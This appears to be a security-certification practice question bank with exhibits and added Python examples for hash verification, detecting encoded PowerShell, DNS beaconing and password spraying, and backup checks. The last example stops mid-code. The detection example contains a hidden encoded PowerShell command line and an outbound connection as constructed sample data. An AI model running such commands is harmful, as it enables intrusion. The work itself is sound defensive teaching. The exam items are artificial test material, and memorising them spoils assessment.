A network analyst reviews packet captures from a subnet where users intermittently lose access to the gateway. Which two findings would most strongly indicate ARP spoofing? Select two.

Question 195 (hard, multi select)

A Linux operations team must run a nightly maintenance script on 70 servers to rotate logs and restart one service. Security will not allow interactive SSH logins, and the script should only have the permissions required for those two commands. Which two configuration choices best meet the requirement? Select two.

Question 196 (medium, multiple choice)

A system administrator must run a weekly maintenance script that stops and restarts two services on 50 Linux servers. Security says the job must not use an interactive login and should have only the permissions needed for that task. What is the best approach?

Question 197 (medium, multiple choice)

A public web application is seeing bursts of requests that contain SQL metacharacters, encoded script tags, and attempts to POST to administrative endpoints. The team wants a control that can inspect HTTP traffic and block the malicious requests before they reach the app. What should be deployed?

Question 198 (medium, multiple choice)

A help desk ticket reports that a user's Microsoft 365 mailbox sent hundreds of messages to external contacts, and the user says they are still receiving MFA prompts they did not start. The attacker may still have an active web session. What is the best first containment action?

Question 199 (medium, multiple choice)

An investigator has just created a bit-for-bit image of a suspect's SSD using a write blocker. Before the drive is returned to evidence storage, what action most directly validates the integrity of both the original media and the image?

Question 200 (hard, multi select)

After a ransomware incident, management sees that last night's backups completed successfully and wants proof they can actually be used before production is declared recovered. Which three actions best validate recoverability? Select three.

Question 201 (medium, multiple choice)

After seizing a suspect's laptop, a responder creates a bit-for-bit disk image using a write blocker. The legal team wants the next step that most directly supports evidence integrity for later review. What should the responder do?

Question 202 (medium, multiple choice)

A branch office's network closet has repeated unauthorized access issues after staff badge in and hold the door for others. Management wants a control that allows one person through after valid badge use and helps prevent tailgating. Which control is best?

Question 203 (hard, multi select)

A SIEM analyst reviews the following sequence from a VPN and email platform over 15 minutes: 47 failed logins against different accounts from one public IP, one successful VPN login from that same IP, a new inbox forwarding rule to an external address, and a mailbox sign-in from a device never seen before. Which three findings most strongly support a password-spraying-to-compromise scenario? Select three.

Question 204 (hard, multi select)

After a ransomware incident, management says backups are available but will not approve closure until the team proves the restore process works without risking production data. Which two actions best validate recoverability? Select two.

Question 205 (medium, multiple choice)

A data center has repeated tailgating incidents at the entry to the server room. Management wants a control that forces one person to pass after badge authentication and prevents two people from entering together. What should be installed?

Question 206 (medium, multiple choice)

A server room uses raised flooring and sits below a chilled-water pipe. Facilities wants the earliest warning if water starts accumulating under the floor tiles. Which control should be added?

Question 207 (easy, multi select)

After collecting a suspect laptop, the responder makes a bit-for-bit image of the drive. Which two actions best support chain of custody? Select two.

Question 208 (hard, multi select)

An analyst receives a disk image and the original hash from a response team member. Before any examination begins, the analyst must be able to show the image is unchanged and that the evidence handling process is defensible. Which two actions are most important? Select two.

Question 209 (medium, multiple choice)

A help desk technician receives an alert that an unmanaged laptop was plugged into a conference room network jack and was automatically placed into a restricted network segment until it passed a security check. Which control is responsible for that behavior?

Question 210 (hard, multi select)

A records room has repeated tailgating after hours and occasional door propping during deliveries. Management wants one control that prevents follow-on entry and another that immediately alerts security if the door is forced open or left ajar. Which two controls best meet the need? Select two.

Question 211 (easy, multi select)

A data center wants to reduce tailgating at a sensitive room entrance. Which two controls are most effective? Select two.

Question 212 (hard, multi select)

A responder has imaged a suspect laptop and needs to preserve the evidence for possible legal action. Which three actions best support chain of custody and admissibility? Select three.

Question 213 (easy, multi select)

A security team receives a suspicious email attachment and wants to inspect its behavior safely before any user opens it. They also want a tool that can isolate the same threat if it reaches an endpoint. Which two tools or capabilities best fit this need? Select two.

Question 214 (medium, multiple choice)

A system administrator must run a weekly patch-and-restart job on 80 Linux servers without logging in interactively. The job should be repeatable, auditable, and limited to only the required maintenance commands. What is the best approach?

Question 215 (hard, multi select)

A SOC analyst reviews an EDR alert showing powershell.exe launched with an encoded command, then immediately connected to an unfamiliar IP address and spawned rundll32.exe. The user is still logged in and the machine may still contain evidence needed for investigation. Which two actions should the analyst take first to contain the incident while preserving evidence? Select two.

Question 216 (easy, multiple choice)

Based on the exhibit, which tool should the security team use to safely observe the attachment's behavior before delivery to users?

Exhibit

Email Security Gateway Queue
Message ID: 77129
From: vendor.billing@example.net
Subject: Updated invoice for Q4
Attachment: invoice_q4.xlsm
Attachment Type: Macro-enabled spreadsheet
Static Scan Result: No signature match
Dynamic Analysis Status: pending
Policy Action: hold for review
Question 217 (medium, multiple choice)

Facilities sees occasional water droplets forming above the cable trays in a data room during humid afternoons. The team wants the earliest possible warning before equipment is damaged. Which control should be added?

Question 218 (hard, multi select)

A SIEM correlates the following: 17 failed logons against the same VPN account from one IP in 9 minutes, a successful login from that IP, creation of a new API token in the SaaS tenant, and a large export job started two minutes later. Which two interpretations are best supported? Select two.

Question 219 (medium, multiple choice)

A contractor connects a personal tablet to a lobby Ethernet jack. The network team wants the device blocked from internal resources until it passes posture checks and only guest access is allowed meanwhile. Which control best fits?

Question 220 (medium, multiple choice)

After a ransomware event, management wants proof that last night's backups can actually support business operations before they declare recovery complete. What is the best action?

Question 221 (medium, multiple choice)

A Linux operations team needs to run a nightly script that restarts one service and archives its logs on 60 servers. Security does not want an administrator to log in interactively, and the script should have only the permissions needed for that job. What is the best approach?

Question 222 (medium, multiple choice)

A SOC analyst confirms that a critical Linux virtual machine is making outbound connections to a known malicious IP address. The application owner says the VM hosts a revenue system that cannot be powered off without causing a major outage. What is the best containment action?

Question 223 (easy, multiple choice)

Based on the exhibit, which control would best reduce unauthorized follow-on entry into the records room?

Exhibit

Facility Access Log
Location: Records Room Door 3
08:11  Badge ID 1441 Granted
08:11  Door Opened
08:12  Door Held Open Alarm Cleared
08:12  Badge ID 1441 Granted
08:12  Door Opened
Camera Note: 'Unknown person followed employee through the door.'
Question 224 (medium, multiple choice)

A SIEM correlates VPN logs and sees the same public IP make one failed login attempt against 56 different user accounts over 25 minutes. The usernames vary, but the password value appears to be the same in each attempt. Ten minutes later, one of those accounts authenticates successfully from the same IP, and no password-reset events are recorded. Which attack pattern is most likely?

Question 225 (medium, multiple choice)

Help desk staff must restart one Windows service and read its event logs on 150 servers, but they should not have local administrator rights or interactive logon to the systems. Which approach best supports this requirement?

Question 226 (medium, multiple choice)

After seizing a suspected insider's laptop, a responder makes a bit-for-bit image of the drive. The legal team asks what step most directly proves the image was not altered after acquisition. What should be done?

Question 227 (easy, multi select)

A SOC analyst reviews one user account and sees several failed logins from a single IP, then a successful login from the same IP, followed by a new inbox forwarding rule to an external address. Which two findings most strongly suggest account compromise? Select two.

Question 228 (easy, multiple choice)

Based on the exhibit, what should the team do next to confirm the backups can actually be used during an outage?

Exhibit

Backup Status Report
System: File Server FS-03
Nightly Backup Job: SUCCESS
Backup Sets Retained: 14
Last Successful Job: 02:00 today
Last Restore Test: 118 days ago
Note: No recent validation of file recovery has been recorded.
Question 229 (medium, multiple choice)

A company is placing a customer-facing web application behind a new security control. The team wants to block malicious HTTP requests such as injection attempts before they reach the application server, with minimal code changes to the app itself. Which control is the best fit?

Question 230 (medium, multiple choice)

A SOC analyst receives an EDR alert showing a finance laptop creating encrypted archives and then attempting SMB connections to several internal file shares. The user is still logged in, and the business wants to stop possible spread without destroying volatile evidence. What should the analyst do first?

Question 231 (medium, multiple choice)

An email attachment from an external supplier is not blocked by signature-based AV, but the SOC wants to see whether it drops files, launches child processes, or contacts suspicious domains before delivery to users. Which control best fits?

Question 232 (easy, multiple choice)

Based on the exhibit, what should the analyst do before opening the forensic image for examination?

Exhibit

Evidence Receipt Form
Case: 24-1187
Item: 4A
Description: SSD from workstation WS-14
Acquisition Method: Bit-for-bit image created with write blocker
Source SHA-256: 9e8f1a7c4c0d2f1b...
Image SHA-256: not yet calculated
Chain of Custody: pending analyst verification
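
An added example, not the page's own, of the step the exhibit leaves pending: hash the image, compare it with the acquisition hash before any examination, and write the verification itself into the chain-of-custody record. The same verification answers Questions 199, 201, 208 and 226. The "image" here is a constructed byte string written to a temporary file; case 24-1187 and item 4A come from the exhibit, while the analyst name is made up.

```python
import hashlib
import hmac
import json
import os
import re
import tempfile
from datetime import datetime, timezone

HEX_SHA256 = re.compile(r"^[0-9a-f]{64}$", re.I)


def looks_like_sha256(value):
    """Reject truncated or copy-pasted values such as '9e8f1a7c...' before comparing."""
    return bool(HEX_SHA256.match(value.strip()))


def sha256_file(path, chunk_size=1024 * 1024):
    """Stream the file: forensic images are far larger than memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify_image(image_path, recorded_source_hash):
    """Compare the image hash with the hash recorded at acquisition."""
    if not looks_like_sha256(recorded_source_hash):
        raise ValueError("recorded source hash is not a complete SHA-256 value")
    image_hash = sha256_file(image_path)
    return {
        "image_sha256": image_hash,
        "matches_source": hmac.compare_digest(image_hash.lower(), recorded_source_hash.lower()),
    }


def custody_entry(case, item, analyst, result):
    """One append-only custody line documenting who verified what, and when."""
    return json.dumps({
        "case": case,
        "item": item,
        "time_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "analyst": analyst,
        "action": "verified image hash against acquisition hash before examination",
        "image_sha256": result["image_sha256"],
        "matches_source": result["matches_source"],
    })


def demo():
    """Constructed data: a small byte string stands in for a multi-GB dd/E01 image."""
    raw = bytes(range(256)) * 64
    acquisition_hash = hashlib.sha256(raw).hexdigest()   # what the write-blocked capture recorded
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "WS-14-item-4A.dd")
        with open(path, "wb") as f:
            f.write(raw)
        intact = verify_image(path, acquisition_hash)
        with open(path, "r+b") as f:                     # flip one byte: any later edit breaks the match
            f.seek(100)
            f.write(b"\x00" if raw[100] != 0 else b"\x01")
        tampered = verify_image(path, acquisition_hash)
    return {"intact": intact["matches_source"], "tampered": tampered["matches_source"],
            "log": custody_entry("24-1187", "4A", "second-analyst", intact)}


if __name__ == "__main__":
    print(demo())
```

The truncated value shown on the receipt form ('9e8f1a7c4c0d2f1b...') would be rejected by looks_like_sha256; the full 64-character hash from the acquisition record is what gets compared. Re-hashing the original media is only appropriate through a write blocker with the custody log updated, since the drive is sealed; normally both the source and the image are hashed once at acquisition and the image is verified from then on.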
Question 233 (medium, multiple choice)

After hours, EDR alerts show a finance laptop encrypting local files and trying SMB connections to nearby workstations. The user is still logged in, and management wants the fastest step that limits spread while preserving evidence. What should the SOC do first?

Question 234 (medium, multiple choice)

Following a ransomware incident, management wants to verify that backups are usable and that a restored file server will meet recovery expectations before declaring the system trusted again. Which action is best?

Question 235 (easy, multi select)

A workstation is suspected of running malware and contacting an unknown host. Which two actions belong in the containment phase? Select two.

Question 236 (easy, multi select)

After a ransomware event, management wants proof that backups can actually be used before trusting them. Which two activities best validate recoverability? Select two.

Question 237 (hard, multi select)

A server room sits below a chilled-water line, and occasional condensation is forming on the pipe during humid afternoons. Facilities wants the earliest warning before water reaches equipment and a way to get an alert even if no one is onsite. Which two controls should be implemented? Select two.

Question 238 (hard, multi select)

A post-incident review shows the SOC detected malicious PowerShell activity six hours late because the existing detections did not correlate the encoded command, the unusual outbound connection, and the creation of a scheduled task. Leadership wants the two follow-up actions most likely to improve future response. Select two.

Question 239 (medium, multiple choice)

A SOC analyst confirms that a workstation is encrypting local files and attempting SMB connections to nearby hosts. The user is still logged in, and the business wants to limit spread without destroying evidence. What is the best immediate action?

Question 240 (hard, multi select)

A Linux operations team must run a nightly maintenance workflow on 60 servers to rotate logs and restart one service. Security does not allow interactive root logins, and every execution must be auditable. Which two practices best support secure administration? Select two.

Question 241 (medium, multiple choice)

After a ransomware event, the team restores a file server from backup, but management wants proof that the restore process will work before the backups are declared trusted. What should be done next?

Question 242 (hard, multi select)

A SIEM report shows this sequence over 25 minutes: the same public IP submitted one failed password attempt against 53 different accounts, then one account successfully authenticated, created an inbox forwarding rule, and downloaded hundreds of messages through the web portal. Which two conclusions are best supported? Select two.

Question 243 (easy, multiple choice)

Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?

Exhibit

EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
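
An added example, not from the page, of the correlation that Question 238 says was missing and that this exhibit, the WS-224 timeline in Question 164 and the alert in Question 215 all describe: one rule that ties an Office parent process, an encoded PowerShell command, a script dropped in a user-writable path, a new scheduled task and an external connection on the same host inside a short window, and emits the eradication list (task, file, destination) the responders need. The events mirror the two exhibits but are constructed; the internal-network list, the window length and the minimum indicator count are assumptions for the example.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Explicit internal ranges. ipaddress.is_private is deliberately not used: Python treats the
# RFC 5737 documentation range 203.0.113.0/24 used in the exhibits as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
PERSISTENCE_ROOTS = ("c:\\programdata\\", "c:\\users\\")
SCRIPT_EXTS = (".vbs", ".ps1", ".js", ".bat", ".hta")

# Constructed EDR events modelled on the WS-224 timeline and FIN-LT-22 alert; not real telemetry.
EVENTS = [
    {"ts": "11:07", "host": "WS-224", "type": "process", "image": "winword.exe", "parent": "explorer.exe",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"ts": "11:08", "host": "WS-224", "type": "process", "image": "powershell.exe", "parent": "winword.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"},
    {"ts": "11:09", "host": "WS-224", "type": "file_write", "image": "powershell.exe",
     "path": "C:\\ProgramData\\updater.vbs"},
    {"ts": "11:10", "host": "WS-224", "type": "task_create", "image": "powershell.exe",
     "task": "UpdaterSvc", "action": "wscript.exe C:\\ProgramData\\updater.vbs"},
    {"ts": "11:12", "host": "WS-224", "type": "network", "image": "powershell.exe",
     "dst_ip": "203.0.113.77", "dst_port": 8443, "blocked": True},
    # Benign scheduled admin script on another host: must not fire.
    {"ts": "11:30", "host": "ADM-01", "type": "process", "image": "powershell.exe", "parent": "taskeng.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Archive.ps1"},
    {"ts": "11:31", "host": "ADM-01", "type": "network", "image": "powershell.exe",
     "dst_ip": "10.20.0.5", "dst_port": 445, "blocked": False},
]


def has_encoded_command(cmdline):
    """PowerShell accepts -EncodedCommand, -ec and any unambiguous prefix such as -e or -enc."""
    for tok in cmdline.split():
        t = tok.lower()
        if t.startswith("-") and len(t) > 1 and (t == "-ec" or "encodedcommand".startswith(t[1:])):
            return True
    return False


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def indicators_for(event):
    """Map one event to zero or more indicator names."""
    out = []
    if event["type"] == "process" and event["image"] == "powershell.exe":
        if event["parent"] in OFFICE_APPS:
            out.append("office_spawned_powershell")
        if has_encoded_command(event["cmdline"]):
            out.append("encoded_powershell")
    if event["type"] == "task_create":
        out.append("persistence_created")
    if event["type"] == "file_write":
        p = event["path"].lower()
        if p.startswith(PERSISTENCE_ROOTS) and p.endswith(SCRIPT_EXTS):
            out.append("script_dropped_in_writable_path")
    if event["type"] == "network" and not is_internal(event["dst_ip"]):
        out.append("external_connection_from_powershell" if event["image"] == "powershell.exe" else "external_connection")
    return out


def eradication_items(events):
    """Artifacts the responders must remove or block, pulled from the correlated events."""
    items = {"scheduled_tasks": [], "files": [], "block_destinations": []}
    for e in events:
        if e["type"] == "task_create":
            items["scheduled_tasks"].append(e["task"])
        if e["type"] == "file_write":
            items["files"].append(e["path"])
        if e["type"] == "network":
            items["block_destinations"].append(f'{e["dst_ip"]}:{e["dst_port"]}')
    return items


def correlate(events, window=timedelta(minutes=15), min_indicators=3):
    """Per host, the first window holding >= min_indicators distinct indicators raises one alert."""
    per_host = defaultdict(list)
    for e in events:
        for ind in indicators_for(e):
            per_host[e["host"]].append((datetime.strptime(e["ts"], "%H:%M"), ind, e))
    alerts = []
    for host, hits in per_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _, _) in enumerate(hits):
            inside = [h for h in hits[i:] if h[0] - start <= window]
            kinds = {h[1] for h in inside}
            if len(kinds) >= min_indicators:
                alerts.append({"host": host, "window_start": start.strftime("%H:%M"),
                               "indicators": sorted(kinds),
                               "eradication": eradication_items([h[2] for h in inside])})
                break
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```

Any single indicator here is noisy on its own (administrators run encoded commands, installers create tasks); requiring several distinct ones on one host within minutes is what removes the six-hour delay described in Question 238 without flooding the queue.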
Question 244 (medium, multiple choice)

A web team is moving a customer portal behind a new inspection device. They need something that can examine HTTP requests, block malicious patterns like injection attempts, and still allow normal browsing. Which control is most appropriate?

Question 245 (medium, multiple choice)

An email gateway receives a macro-enabled spreadsheet from an external supplier. Signature-based scanning does not flag it, but the security team wants to observe whether it drops files, creates persistence, or contacts suspicious domains before delivery to the user. Which tool best meets this need?

Question 246 (medium, multiple choice)

Following a ransomware incident, management wants proof that the organization can actually recover from its backups before declaring the backups trustworthy. What should the security team do next?

Question 247 (medium, multiple choice)

The web team is placing a public customer portal behind a control that can inspect HTTP requests, block malicious payloads such as SQL injection and cross-site scripting, and still allow legitimate application traffic without rewriting the app. Which control should they deploy?

Question 248 (medium, multiple choice)

A Linux web server was compromised through an outdated package. The team isolated the host, captured evidence, removed a malicious cron job, patched the vulnerable package, and confirmed no persistence remains. Which incident response phase are they primarily in now?

Question 249 (medium, multiple choice)

A SIEM reviews VPN authentication logs and sees 36 different usernames each receive one failed login attempt from the same source IP over 20 minutes, followed by one successful login to an unrelated account. Which attack is most likely?

Question 250 (easy, multiple choice)

An office loses power several times each month, causing servers to shut down without warning. Which control best helps keep the systems running long enough for a safe shutdown?

Question 251 (easy, multiple choice)

A user reports a suspicious pop-up on a workstation and the SOC suspects malware. Which action should the responder take first to contain the threat?

Question 252 (hard, matching)

Match each SOC alert artifact to the most useful investigation pivot. Each pivot should help determine whether the alert is a true incident, a false positive, or part of a broader campaign.

Matches

Check whether the pattern matches password spraying across accounts rather than a brute-force attempt on one user.

Pivot to parent-child process trees and script-block telemetry on the endpoint.

Compare the query pattern and periodicity for possible DNS tunneling or beaconing.

Correlate with scheduled tasks, recent file creation, and account activity for staging or exfiltration.

Review token/session logs and conditional-access telemetry to see whether a hijacked session or relay attack occurred.

Question 253 (easy, multiple choice)

Employees in a server room often prop the door open while carrying equipment. What control best helps detect and prevent this behavior?

Question 254 (easy, multiple choice)

A SOC analyst notices that log timestamps from different servers do not line up during an investigation. What should be implemented to improve event correlation?

Question 255 (easy, multiple choice)

A branch office loses power briefly several times each month. Which control best helps keep network equipment running long enough for an orderly shutdown?

Question 256 (easy, multiple choice)

A SOC analyst sees 38 failed logins for a finance user account from one public IP address over 4 minutes, followed by one successful login. What should the analyst do first?

Question 257 (easy, multiple choice)

A SOC analyst wants to make sure logs from multiple servers can be compared accurately during an incident review. What should be configured on those systems?

Question 258 (easy, multiple choice)

A critical patch must be applied to a production server next week. What is the best way to reduce the risk of downtime if the patch causes a problem?

Question 259 (easy, multiple choice)

A help desk team needs to update desktops in a call center without interrupting callers during peak hours. What is the best operational approach?

Question 260 (easy, multiple choice)

A laptop is suspected of being compromised, and the responder wants to preserve useful evidence before shutting it down. What should be done first?

Question 261 (easy, multiple choice)

Before applying a critical patch to a production application server, which action best reduces the risk of extended downtime if the patch fails?

Question 262 (easy, multiple choice)

A user reports a ransomware note on one department file share, but other departments are still working normally. What is the best first containment action?

Question 263 (medium, matching)

Match each security monitoring artifact from the SOC alert queue to the best investigation focus.

Matches

Investigate possible script-based malware execution launched through a document

Check for suspicious domain lookups that may indicate command-and-control activity

Look for beaconing behavior from a potentially compromised endpoint

Assess for stolen credentials or credential-stuffing activity

Question 264 (easy, multiple choice)

A critical patch must be applied to a retail point-of-sale server. What is the best way to reduce business disruption?

Question 265 (medium, matching)

Match each change-management practice to the best description for reducing patching risk in production.

Matches

Use a phased rollout to catch compatibility issues early

Provide a rollback or backout plan if the patch fails

Place the work inside a maintenance window

Create a baseline that supports recovery and comparison

Apply change control and obtain approval

Question 266 (easy, multiple choice)

A server room is sometimes left open while technicians carry equipment in and out. Which control best helps detect and discourage unauthorized entry?

Question 267 (medium, matching)

Match each incident response action to its primary purpose during a suspected endpoint compromise.

Matches

Contain the incident and limit spread to other systems

Preserve evidence that could disappear after power-off

Eradicate persistence and return the system to a trusted state

Recover business operations and return service to normal

Complete lessons learned and improve future response

Question 268 (easy, multiple choice)

A SIEM alert shows 120 failed logins for one user account from three different countries within 10 minutes, followed by a successful login. What should the analyst do first?

Question 269 (easy, multiple choice)

After a phishing incident, the security team wants to preserve evidence for later review. Which action is most appropriate?

Question 270 (easy, multiple choice)

A SIEM correlation rule alerts when a single user account fails to authenticate 20 times in 5 minutes and then succeeds from the same source IP. What is the most likely reason the team should investigate this event?

Question 271 (hard, matching)

Match each detection pattern to the most likely security issue. Each item has one best match.

Matches

Living-off-the-land or fileless malware execution

DNS tunneling or command-and-control beaconing

Password spraying or credential stuffing that succeeded

Compromised privileged credentials with persistence and post-exploitation activity

Question 272 (easy, multiple choice)

An EDR alert shows a user workstation launching an unfamiliar executable from the Downloads folder and then making repeated outbound connections to an IP address in another country. What is the best first response by the security team?

Question 273 (medium, multiple choice)

An EDR console alerts that powershell.exe launched with an encoded command on a finance workstation, and a minute later the host begins making repeated outbound connections to an unfamiliar IP address. What is the best initial response?

Question 274 (medium, multiple choice)

A hardening script is pushed to a production web server and, within minutes, the application stops accepting secure connections. The team discovers the script disabled a required TLS setting that the legacy application still needs. What should have been in place to reduce the impact of this change?

Question 275 (medium, multiple choice)

An NDR tool shows a production web server sending small, periodic DNS queries to random-looking subdomains under a domain the company does not use. The pattern repeats every 60 seconds, even when normal web traffic is idle. What is the best interpretation and next step?

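Worked example for Question 275 (and the DNS-tunneling and beaconing matches in Questions 263 and 271). This is an added illustration, not part of the Courseiva question set: it scores a constructed DNS query log per registered domain on two signals an NDR tool reports, how regular the gaps between queries are (a low coefficient of variation means a timer, not a person) and whether the subdomain labels are never-repeating, high-entropy strings (data being smuggled in the query name). The domain names, timestamps, thresholds and the "last two labels" rule for the registered domain are all assumptions made for the example.

```python
import math
from collections import Counter, defaultdict
from statistics import mean, pstdev

# Constructed query log as (seconds since start, queried name); not real traffic.
# The first domain mimics a 60-second beacon with a fresh random label per query.
QUERY_LOG = [(60 * i, f"{lbl}.c2-example.net") for i, lbl in enumerate(
    ["k3j9x1q7", "p0a2mz8v", "w8u1t5rq", "zq4n7yb2", "h6c0e9lx",
     "r2v5k8pt", "m1x9d4fw", "j7b3n0sa", "t5q8g2hy", "e9w4l1kn"])]
# Ordinary browsing: a few well-known hosts, looked up at irregular times.
QUERY_LOG += list(zip([2, 9, 31, 45, 120, 133, 300, 311, 420, 480],
                      [f"{lbl}.example-legit.com" for lbl in
                       ["www", "api", "www", "mail", "www", "api", "www", "www", "mail", "api"]]))


def entropy(s):
    """Shannon entropy of the characters in s, in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def split_name(qname):
    """Assumption: the registered domain is the last two labels. Production tooling
    should use the public suffix list so names under e.g. co.uk group correctly."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile(log, min_queries=5, max_cv=0.1, min_unique=0.8, min_entropy=2.5):
    """Per registered domain: query count, coefficient of variation of the gaps
    between queries (low = periodic), share of never-repeated subdomains and their
    mean entropy (high = machine-generated labels). Thresholds are starting points
    to tune against the environment's own baseline."""
    by_domain = defaultdict(list)
    for ts, qname in log:
        domain, sub = split_name(qname)
        by_domain[domain].append((ts, sub))
    out = {}
    for domain, rows in by_domain.items():
        rows.sort()
        times, subs = [t for t, _ in rows], [s for _, s in rows]
        gaps = [b - a for a, b in zip(times, times[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) > 1 and mean(gaps) > 0 else float("inf")
        unique = len(set(subs)) / len(subs)
        ent = mean(entropy(s) for s in subs)
        verdicts = []
        if len(rows) >= min_queries and cv <= max_cv:
            verdicts.append("periodic")
        if unique >= min_unique and ent >= min_entropy:
            verdicts.append("random_labels")
        out[domain] = {"queries": len(rows), "cv": round(cv, 3),
                       "unique_ratio": round(unique, 2), "entropy": round(ent, 2),
                       "verdict": "+".join(verdicts) or "normal"}
    return out


def suspicious(log):
    """Domains worth a pivot into NDR/EDR data: anything not scored 'normal'."""
    return sorted(d for d, p in profile(log).items() if p["verdict"] != "normal")


if __name__ == "__main__":
    for domain, p in profile(QUERY_LOG).items():
        print(domain, p)
    print("pivot on:", suspicious(QUERY_LOG))
```

The beacon domain scores "periodic+random_labels" while the browsing domain stays "normal". Neither signal alone is conclusive (software updaters are periodic; CDN hostnames are high-entropy), which is why the next step in the question is to isolate and investigate the host rather than to block a domain and move on.
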
Question 276 (easy, multiple choice)

A file server begins encrypting documents, and the SOC confirms the activity is malicious. Which incident response step should happen first to limit further damage?

Question 277 (medium, multiple choice)

A SOC analyst receives an alert from the VPN appliance and identity platform. In the last 10 minutes, a user account had 14 failed VPN logons from one country, then one successful login from a different country. The user calls the help desk and says they have not used their account today. What should the analyst do first?

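Worked example for the authentication-log scenarios in Questions 242, 249, 256, 268, 270 and 277. This is an added illustration, not part of the Courseiva question set: it runs a simple SIEM-style correlation over constructed login events and separates password spraying (one or two failures each across many accounts from one source) from brute force (many failures against one account), flags the success that follows either burst, and separately flags an account whose successful login comes from a country none of its failures came from. Event fields, IP addresses (RFC 5737 test ranges), usernames, country codes and the thresholds are assumptions made for the example.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

BASE = datetime(2024, 5, 1, 2, 0, 0)


def ev(offset_s, src_ip, user, result, country):
    """Build one normalised authentication event (constructed sample data)."""
    return {"ts": BASE + timedelta(seconds=offset_s), "src_ip": src_ip,
            "user": user, "result": result, "country": country}


# Q242/Q249 pattern: one failure each against many accounts from one IP, then one success.
SPRAY_EVENTS = [ev(30 * i, "198.51.100.9", f"user{i:02d}", "fail", "RO") for i in range(36)] \
    + [ev(1200, "198.51.100.9", "jsmith", "success", "RO")]
# Q256/Q270 pattern: dozens of failures against one account from one IP, then a success.
BRUTE_EVENTS = [ev(6 * i, "203.0.113.5", "finance01", "fail", "US") for i in range(38)] \
    + [ev(240, "203.0.113.5", "finance01", "success", "US")]
# Q277 pattern: failures from one country, then a success on the same account from another.
TRAVEL_EVENTS = [ev(40 * i, "192.0.2.77", "acarter", "fail", "BR") for i in range(14)] \
    + [ev(600, "192.0.2.88", "acarter", "success", "DE")]
# Benign: a user mistypes twice and then logs in; this must not page anyone.
NORMAL_EVENTS = [ev(0, "198.51.100.20", "dlee", "fail", "US"),
                 ev(20, "198.51.100.20", "dlee", "fail", "US"),
                 ev(45, "198.51.100.20", "dlee", "success", "US")]


def analyse(events, window=timedelta(minutes=30), spray_min_users=10, brute_min_fails=10):
    """Classify failure bursts per source IP and flag any success that follows them,
    then look per account for a success from a country the failures did not come from.
    Thresholds are assumptions; a low-and-slow spray needs a longer window."""
    findings = []
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["src_ip"]].append(e)
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "fail"]
        if not fails or fails[-1]["ts"] - fails[0]["ts"] > window:
            continue
        per_user = Counter(e["user"] for e in fails)
        label = None
        if len(per_user) >= spray_min_users and max(per_user.values()) <= 2:
            label = f"password_spray src={ip} accounts={len(per_user)}"
        elif max(per_user.values()) >= brute_min_fails:
            user, n = per_user.most_common(1)[0]
            label = f"brute_force src={ip} user={user} fails={n}"
        if label is None:
            continue  # a couple of typos before a login is normal, not a finding
        findings.append(label)
        # The success after the burst is the event that turns a noisy alert into an incident.
        for e in evs:
            if e["result"] == "success" and e["ts"] >= fails[0]["ts"]:
                findings.append(f"success_after_failures src={ip} user={e['user']}")
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    for user, evs in by_user.items():
        fail_countries = {e["country"] for e in evs if e["result"] == "fail"}
        for e in evs:
            if e["result"] == "success" and fail_countries and e["country"] not in fail_countries:
                findings.append(f"geo_mismatch user={user} success_from={e['country']}")
    return sorted(findings)


if __name__ == "__main__":
    for name, batch in [("spray", SPRAY_EVENTS), ("brute", BRUTE_EVENTS),
                        ("travel", TRAVEL_EVENTS), ("normal", NORMAL_EVENTS)]:
        print(name, analyse(batch))
```

The distinction matters for the response: a spray that lands one account is an attacker who already has a valid credential (disable or reset that account, look for mailbox rules and sessions created after the login), whereas a burst against one account says which user to contact and which source to block. In every case the first step is to contain the account that actually authenticated, not merely to block the source IP.
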
Question 278 (easy, multiple choice)

After a workstation hardening baseline is updated, the security team wants to confirm that finance laptops actually match the new settings. Which control is the best way to verify this?

Question 279 (medium, multiple choice)

A nightly backup job shows "Completed successfully" in the backup console, but a test restore fails with an authentication error after the backup service account password was rotated last week. What is the best next step?

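Worked example for the backup-trust scenarios in Questions 241, 246 and 279. This is an added illustration, not part of the Courseiva question set: it records a SHA-256 manifest when a backup is taken, then proves the backup by restoring it into a scratch directory and comparing every restored file against that manifest, ignoring whatever status the backup job reported. The file names, contents and the gzipped-tar format are assumptions made for the example; the second run simulates a job that reported success but left a truncated archive.

```python
import hashlib
import tarfile
import tempfile
import zlib
from pathlib import Path


def sha256_file(path):
    """Stream a file through SHA-256 so large backups do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def make_manifest(root):
    """Map every file under root (as a relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
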